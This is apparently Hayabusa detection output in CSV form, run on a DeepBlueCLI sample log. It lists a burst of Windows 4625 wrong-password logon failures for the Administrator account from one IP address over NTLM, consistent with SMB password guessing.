2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gNEYkgBoG8rAE6SP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vyy1aBvh6lJBs5M5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhiWNroUS5X5AEh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg9rUUIwEfujwCvq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zfvpeyTKc3YYkVkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJGR6CYKLUJp2fWl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cmSap0AJZq0KMRBV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnVCbq1IYZF19oYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVaDMa2uNXTZNcBj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymf6Fhv5ieWwcq73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CT6YMlX1GqeEuAHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FDJ1IFpMNQ2Euhyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EGTzqnHJIiZdSgNk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: epSckAKbAp8qag89 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NNC8ilAuznKPwFvV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wObt647cIBPiVaZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nYDe1L7NNxDGQ0Vt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXroClxv7B0aCTYv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kCVah2QOH1hMSV76 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2HjD65Xy4Hppim2l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwmEQxC4iTcF4aFu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q3QxOH7ok8RR068t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJFj6Ckw1HdK9w52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qqu3Im4HXQNyGnYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bk5dmjQDnpSlREum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pk4BvYgXBR2whf80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6n1su2TUr7ONQr4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: givsEAGfG0smN9Re | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i2YuM0i7a2QuY7xb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xuocQPZpd91adY0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PvGB1dZrfDWyZoqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4oi8iL88rJo7g2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3OUnytXi4NjvqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WKkJcp3TYj31iJUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0E44RVqAE1feU0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny5LCb1qOIUhxOPY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9jcDgzzqH26DjQ1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yil94cFkU6UP24SK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkdVHF3vggCcuNdn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dRRI2CS3aVIX4nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: chDZq3VgxIE2mRb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HLVvgMmqLXKZADON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i4avO2AJSlNb0IUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mdo5CvycGvGhn33y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heJfjLl1vbX6lMjZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOP1E6hd4Jtj4gob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xa7kMCNz0bEGTBqX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSxTQ4HsZt2DeYVe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxHpSQwFSV4hveVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n3OwzSPomxZLoCe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e9IfwDZIfYT6A50K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOf6DbRX4zlNqLdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00kXrnJNH40NyoYL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nsNHcb9pnpdRgeL7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucMhgxMXy9Ch1jNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cfi3ZaLTECJgjM9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: usugjEEBHlhJvOyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQ1pM2CVLt5ITVD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NIboW7hNljF3HPpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOk5W4rkSYRRw4xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJTfcwd8rnFc06iF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sm415W5zkvjdnTV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KEiSbtlmW4ou1mc7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xWeZV5pHt94adwUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5np7HeCPAFTDdTXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gXbe2jEJVtwaQXlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hZFiUCJnaBdHcw4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a71wyo41KV1ZoT7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogB17WdeOiC19rqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ANOLPWG12lkW39Ei | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y1vf7OUxb6TH3Q4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxU5yumSieUzSgzH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9K5EoWWASU8SlSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PwZLRPFxaFWwjZEe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8fXgFFb3HTMunsoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
